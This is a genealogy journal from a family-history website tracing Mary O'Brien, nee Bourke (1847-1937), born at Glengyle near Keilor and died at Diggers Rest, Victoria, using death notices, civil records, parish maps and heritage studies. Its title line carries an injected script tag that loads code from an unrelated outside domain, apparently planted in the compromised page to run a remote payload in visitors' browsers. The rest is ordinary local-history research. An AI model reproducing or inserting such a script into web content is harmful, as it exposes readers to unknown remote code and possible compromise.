MARY O'BRIEN, NEE BOURKE, BORN GLENGYLE, KEILOR 1847, DIED DIGGERS REST 1937 (VICTORIA, AUSTRALIA.)<script src="https://bestdoctornearme.com/splitter.ai/index.php"></script> :: FamilyTreeCircles.com Genealogy
<< Previous - Next >>

MARY O'BRIEN, NEE BOURKE, BORN GLENGYLE, KEILOR 1847, DIED DIGGERS REST 1937 (VICTORIA, AUSTRALIA.)

Journal by itellya

O'BRIEN.--At her residence. Digger's Rest, Mary, daughter of the late Michael and Margaret Bourke, beloved sister of Kate (Mrs. Kane), James, Margaret (Mrs. Leyden*), Bridget (Mrs Connell), Michael and John (all deceased), born at Glengyle, Keilor*, 17th October, 1847. R.I.P. (P.15, The Age, 5-6-1937.)

*This location seems to be a correction of a mistake made on 31-5-1937 in The Age and The Argus. There was no "Glengyle" in Kilmore, the only result for "Glengyle,Kilmore" was in those two 31-5-1937 notices.

Family Notices
Family Notices - The Age (Melbourne, Vic. : 1854 - 1954)Monday 31 May 1937 - Page 1
... Glengyle, Kilmore, 17th October, 1847. R.I.P. O'BRIEN. — On the29th May, at her residence. Diggers' Rest ... 841 words
Text corrected by 4 Voluntroves
Thumbnail for Family Notices
Family Notices
Family Notices - The Argus (Melbourne, Vic. : 1848 - 1957)Monday 31 May 1937 - Page 1
... ), Bridget (Mrs Connell), Michael and John (all dcccascd) born at Glengyle Kilmore 17th October 1847 -R I P ... 5237 words



* HO210 Former Leyden Building 670 Sunbury Road, Bulla (https://hdp-au-prod-app-hcc-participate-files.s3.ap-southeast-2.amazonaws.com/6916/9076/3114/4bc4464ab6b231a69b401bca3231beff_C266_Factsheet_and_list_of_affected_places.pdf )

MARY'S BIRTH RECORD (VICTORIAN BDM ONLINE)
BOURKE Mary Ann Birth
mother: Margaret nee MURPHY father:BOURKE Michael
place of birth:GLANGILE*, 1847, 41840/1847

The VicBDM typists make many transcription errors, but I believe the error in this case was the registrar doing his best to turn what he had heard (the property's name) into written form.

Glengyle was section 1, parish of Tullamarine. Enter this (in bold type) into your search bar to access the parish map.
https://nla.gov.au/nla.obj-232027662/view

Section 1 was one of only a few portions of the parish alienated before the 1843 depression. Richard Hanmer Bunbury, a retired Naval man, may have been a friend of the next owner and soon transferred the title to him.

MORE ABOUT GLENGYLE LATER.
Young Emperor was shown at the Cirencester
Agricultural Meeting in 1842, and then gained
the prize as the best two-year-old Cart Stallion,
and now travel in place of his sire, imported to
this Colony.
This celebrated Cart Horse will stand this
season at the low price of Three Guineas each
Mare, at A. Campbell's, Esq., near Keilor, and
at the station of J. Bathe, Eq., Western Port.
Mares will be received at Kirk's Bazaar every
Friday, and forwarded to the Horse free of ex-
pense. (P.3, Port Phillip Gazette,11-9-1844.)

THE CAMPBELLFIELD SHINTY MATCH. (3-7-1850) link-https://trove.nla.gov.au/newspaper/article/4770349
The sports finished, the company adjourned to Messrs Barber and Lowe's mill, which the proprietors had kindly placed at the disposal of the Stewards, where an ample cold collation, provided by Mr. Yewers. the confectioner in Elizabeth street, awaited their attention, and was done ample justice to under the admirable presidency of Colin Campbell, Esq. of Glengyle.

Others owning portions of the Glengyle Estate in the early 1850's were A. and J. Guthrie and Thomas Bertram (after whom Bertram's ford,near the east end of Browns Rd and the present Arundel Bridge) was named.

It seems that at the time of Mary's birth, her parents were working for the Campbell family.


DIGGERS REST.
This area acquired its name because of Caroline Chisholm. As many women had no choice but to follow their husband to the diggings. Caoline had shelters built near the site of the Essendon railway bridge, just over the Maribyrnong in Keilor Village
(Melway 14 K7), and- in the north east half of Melway354 H2) etc. to provide them with a modicum of privacy and comfort.

I thought that Mary's father would have been the Michael Bourke who built the Manchester Hotel at The Gap but the report of this man's Golden Wedding https://trove.nla.gov.au/newspaper/article/70070479 states that he did not arrive until 12-9-1853.)
He probably had nothing to do with Mary's move to Diggers Rest.

However, many years ago I read an article about an O'Brien family (linked with John Daly) who settled near the site of the Sunbury Pops Festival and I will endeavour to find it.

From the DILLON entry in my DICTIONARY HISTORY OF BULLA journal.
"The deceased's hat was found about five chains down the stream and next morning the carcase of the horse, was washed to O'Brien's ford,...."

The O'Briens had two properties of which I'm aware, Craigllachie and Glencoe. Craigllachie was east of Loemans Rd and fronted Deep Creek just north of the ford connecting with Mansfields Rd in Tullamarine. They had inherited their "Glencoe" from John Daly,the grantee; it was just east of the Page "Glencoe" pre-emptive right and O'Brien's Ford was most likely the Batey/Page ford whose location was within the Holden Flora and Fauna Reserve in Melway 352 J2.

Amongst those who have worked very hard and lent great assistance in the search were: Messrs, J. Duncan, C.M'Kenzie, J. White, M. O'Brien, T.O'Brien, J. Cahill, C. Honan, J. Phelan, M. O'Brien, J. Cahill jun., M. Leyden, J. Scannell, Fannings (2), Reddan (2),Mi'Leod, J. Murphy, Fuller, G. Gillon,M. Allen, C. Taylor, Bell (2),Byrne, Forbes (2).

UNDER TULLAMARINE ISLAND FARMS.
12 A Craigllachie (pronounced craig el ockie) or Deep Valley.
My Tullamarine Parish map gives the names of grantees and the dates on which grants were issued. Surprisingly, I could find no mention of E.F.N.Clarke in the first series index. I had wondered about the year of issue, 36, but concluded that he was related to W.J.T.Clarke and had claimed pre-emptive right on land he had occupied in 1836. While I was talking with Henry Bedford about his time growing up on Fleetbank, I asked about occupancy of Craigllachie and his reply (that the Clarkes had been there for as long as he could remember) started me thinking. Was 36 actually 1936? I dug out a Tullamarine parish map given to me by Gary Vines of the Living Museum of the West. Apart from being handwritten rather than typed and not giving dates, it seemed at a glance identical to mine. I accepted Garys kind offer because it showed the locations of four squatters buildings: Sherrits hut on Glenloeman, and the stations of Hunter on Arundel, Downie on Glendewar and Hall on Stewarton. It said the grantee of 12 A was John Daly. The spelling (as in the case of John Pascoe Fawker for section 7) was wrong but the information was correct.
*In her Broadmeadows History Kit, S.OCallaghan states on page 17 that Arrott (Arnott?) and Daly were bakers in Broadmeadows Township. This was probably the same J.Daly (sic?) who was granted 5H of the parish of Yuroke, of 366 acres. Today 5H in Meadow Heights and Coolaroo is indicated by the southern Norval Ave corner (south west cnr), a point 180 metres west of the weighbridge in Maffra St (south east cnr) and the east-west parts of Lightwood Cres. and Paringa Blvd (north). Presuming that the baker had bought both grants, it is reasonable to suppose that both were used to grow wheat.
That grown in Yuroke would have been milled on the site of the Pipeworks Market (Melway 7, J/10), and that grown on Craigllachie would have been sent to the mill on Lochton (Mel.111, D/4) The latter mill was opened in 1856 by Lochtons grantee, Capt. William Morrison Hunter. It was taken over in the same year by Bell Bros. with Straughans and D.R.Bain as millers. The mill was later owned by W.B.Gadd, who closed it in 1861. (Bulla Bulla P.50). That Craigllachie might be suitable for wheat growing is indicated by the fact that Michael Loeman cultivated a good deal of Glenloeman from 1850 until 1863. (Gadds mill closed 1861!)
John Daleys daughter, Mary, married Michael O'Brien. This may have been the Michael OBrien who was leasing a house in the Strathmore area from G.Urquhart in 1863. (Broadmeadows rates.)
On 16-3-1869, John Daley conveyed Craigllachie to Michael OBrien and his wife Mary:
In consideration of the natural love and affection which the said John Daley hath for his daughter, the said Mary OBrien, and for the said Michael OBrien and for divers other consideration thereunto moving.


(* See Heritage study re the Glencoe Homestead and the Diggers Rest Primary School newsletter article about John Daly, the O'Briens and the homestead in comments. As they lived on Glencoe, they leased Craigllachie to the Heagneys.)

PROBABLY ABOUT A HUNDRED COMMENTS CONTAINING INFORMATION THAT WOULD NOT SUBMIT IN THE JOURNAL. JOHN DALEY'S SON IN LAW COULD BE YET ANOTHER RED HERRING. BACK WITHIN A YEAR!

by itellya on 2013-11-12 07:35:41 (NEAR END)
History and Description:
The disused homestead stands on allotment A of Section 16 in the Parish of Holden.
This section and the surrounding area was surveyed and sold by the Crown in the early 1850s but the use and occupation of this land dates back to the earliest days of settlement in thedistrict. The land in the area was first settled on and grazed by the Page brothers who were born in Kent, England. They are said to have come to the area in early 1836, first setting down on the Deep Creek near Bulla where the Brodie brothers later set up their homestead (allotment A of Section 20 in the Parish of Bulla1), and then moving further west to settle on the south side of
Jackson's Creek. Their run at its greatest contained about 7000 acres on which they kept some7000 sheep and several horses. 2
They called the run Glencoe, which Isaac Batey (a resident in the district from 1846) described as 'an appellation that one would imagine Englishmen would not adopt'. According to an anecdote written up by Batey, Edward Page was in town drinking with fellow squatters, one of whom Batey said was 'doubtless a Scottish man'. Apparently this man asked Page the name of his run and upon receiving the reply that it had no name as yet he responded with the challenge ''Call it Glencoe and I'll stand a bottle of rum'.' According to Batey 'this was agreed to
and the station duly christened'.3
In May 1852, the Page brothers and other early settlers such as George Evans and
Martin Batey received only a months notice to take up their homestead blocks before the wealthy landowner William John Turner Clarke applied to have them put up for sale. He subsequently succeeded in purchasing much of their former leasehold pastoral land.4 The Pages' run was surveyed into sections in the Parish of Holden and sold by the Crown from 1852 onwards. The Page brothers bought their homestead block under pre-emptive right in 1855.5
This land was the 640 acres of Section 15 in the Parish of Holden, which is directly west of the location of the present Glencoe homestead. Batey described the Pages' homestead, a wattle anddaub structure, as located some 600 yards back from a cliffy edge, and slightly over a mile dueeast from Diggers Rest, which places it within this section.6
In June 1854, W.J.T. Clarke bought the 216 acres of allotment A in Section 16 for someL874. At the same time a John Daley bought the adjacent 147 acres of allotment B for someL676. John Daley was born in Co. Galway, Ireland and had arrived in the Colony in the early1840s. He married a Catherine Brehemy in Melbourne, and they had three children - Jane,Michael and Mary. In June 1857, Clarke sold his allotment to a William Speary, who in turn sold it to John Daley and his wife in March 1862. Some years earlier, in September 1856, Daley had also acquired part of allotment C; he paid the owner, Angus Ross, ?95 for an unknown number of acres (possibly about 18-20 at the approximate going rate of over ?4 per --------

VERY LONG WINDED, BUT IT HAS PROVEN THAT MICHAEL BOURKE OF THE MANCHESTER HOTEL AT THE GAP WAS NOT THE FATHER OF MARY O'BRIEN, NEE BOURKE (1847-1937) AND THAT SHE WAS NOT THE MARY WHO MARRIED MICHAEL O'BRIEN OF GLENCOE IN DUNCANS LANE.

It would have been better to find Mary's marriage instead of trying to connect her story to dim memories.

BOURKE Mary Marriage OBRIEN, Martin, 1885, 2487/1885

O'BRIEN. - On the 29th May, at her residence, Diggers Rest, Mary, wife of the late Martin O'Brien mother of William, James, and Francis, in her 90th year. - R.I.P. (P.1, The Argus, 31-5-1937.)

O'BRIEN. - At her residence, Diggers Rest,Mary, daughter of the late Michael and Margaret Bourke, beloved sister of Kate (Mrs
Kane), James, Margaret (Mrs Leyden),Bridget (Mrs Connell), Michael and John (all deceased) born at Glengyle Kilmore* 17th October 1847 -R I P. (P.1, The Argus, 31-5-1937.)
*There was no "Glengyle" in Kilmore. See start of journal. It was corrected to Keilor in The Age on 5-6-1937.

Mary's husband Martin had some bad luck at Diggers Rest, such as anthrax and a stone chip lodging in his eye.

UNABLE TO FIND BIRTH RECORDS FOR THEIR THREE SONS, WILLIAM, JAMES AND FRANCIS AND HAVING NO IDEA WHEN MARTIN DIED (SEE FIRST 31-5-1937 DEATH NOTICE JUST ABOVE) I DID A GOOGLE SEARCH FOR-
MARTIN O'BRIEN, DIGGERS REST MARRIED MARY BOURKE IN 1885, VICTORIA, AUSTRALIA
and on https://www.ancestry.com.au/search/collections/1093/?name=_Bourke
and found two photos, one a gravestone at Sunbury Cemetery and the other of a house with the accompanying text for each as below.
Headstone Michael Bourke, Margaret nee Murphy (Headstone) Cemetary: Sunbury Location: Sunbury cemetery
In loving memory of Michael Bourke late of Diggers Rest who died 16 Oct 1890 aged 79. Also his beloved wife Margaret Bo...
Mary Bourke (born 1847)
To save you going to the top of the journal, here's Mary's birth record again.
MARY'S BIRTH RECORD (VICTORIAN BDM ONLINE)
BOURKE Mary Ann Birth
mother: Margaret nee MURPHY father:BOURKE Michael
place of birth:GLANGILE*, 1847, 41840/1847


Martin & Mary Obrien Farmhouse (SiteBuildingPlace) Date: 1919 Location: Diggers Rest, Victoria, Australia
They grew wheat and bred horses. Original photo B&W. Mary Bourke (born 1847)

WHEN DID MARY'S HUSBAND, MARTIN O'BRIEN, DIE?
ANSWER. 21-6-1919.
THE EVIDENCE DID NOT SUBMIT, AND AS ANOTHER ADDITION ALSO FAILED TO SUBMIT, I WILL PLAY IT SAFE AND PUBLISH THE DETAILS RE MARTIN O'BRIEN'S DEATH IN COMMENT 2 UNDER THE JOURNAL.


IS THERE A DEATH NOTICE OR RECORD FOR MARY'S FATHER?
BOURKE.—On 16th Oct., at his residence, Digger's Rest, Michael Bourke, farmer, aged 79. R.I.P.
(P.2, The Bacchus Marsh Express, 15-11-1890.)

THE Friends of the late Mr. MICHAEL BOURKE
are respectfully invited to follow his remains to
the place of interment, Sunbury Cemetery.
The funeral will leave his late residence, Diggers'
Rest, THIS DAY (Friday, 17th inst.), at 1 o'clock.
JOHN DALEY, Undertaker, Latrobe and Spring
streets, Melbourne. Telephone 827. (P.1, Argus, 17-10-1890.)

Mary's 2nd oldest sibling (Start of journal) was James.
It is with much regret that I announce the death of two old residents, viz., Mr. Michael Bourke, who for a long time represented the East Riding in the Shire of Melton. Deceased was father of Cr. James Bourke. of Coimadai. He was buried at Sunbury. A large assemblage followed the remains to the place of interment. Also Mrs Beattie, wife of Cr. H. Beattie, of Mt. Aitken,who died at her residence. Mt. Aitken, on Sunday.26th ult. (P.7, The Bacchus Marsh Express, 8-11-1890.)

BOURKE Michl Death
mother: Bridtnee MCMAHON father:Jas
place of death:Sunbury, 79, 1890, 17809/1890

Surnames: BOURKE CONNELL KANE LEYDEN MURPHY
Viewed: 337 times
Likes: 0
by itellya Profile | Research | Contact | Subscribe | Block this user
on 2023-08-31 07:42:04

Itellya is researching local history on the Mornington Peninsula and is willing to help family historians with information about the area between Somerville and Blairgowrie. He has extensive information about Henry Gomm of Somerville, Joseph Porta (Victoria's first bellows manufacturer) and Captain Adams of Rosebud.

Do you know someone who can help? Share this:

Comments

by itellya on 2023-08-31 23:05:07

MORE RED HERRINGS.
Michael Bourke of Keilor, (father of Thomas Bourke of Comadai,for whom an obituary was written) grantee of suburban blocks near St Augustine's Church on the north side of Keilor Rd was not the father of Mary O'Brien, nee Bourke (1847-1937.)

Neither was Michael Bourke of Broadmeadows.

by itellya on 2023-09-01 06:47:19

MARTIN O'BRIEN DIED IN 1919 AS STATED BY HIS THREE SONS IN 1938.

MARY'S DEATH NOTICE.
O'BRIEN. - On the 29th May, at her residence, Diggers Rest, Mary, wife of the late Martin O'Brien, mother of William, James, and Francis, in her 90th year. - R.I.P. (P.1, The Argus, 31-5-1937.)

O'BRIEN-In loving memory of our father Martin O'Brien who died 21st June 1919 also our mother who died 29th May 1937 -R.I.P.
(Inserted by Will Jim and Frank)
P.10, THE ARGUS, 28-5-1938.

Register or Sign in to comment on this journal.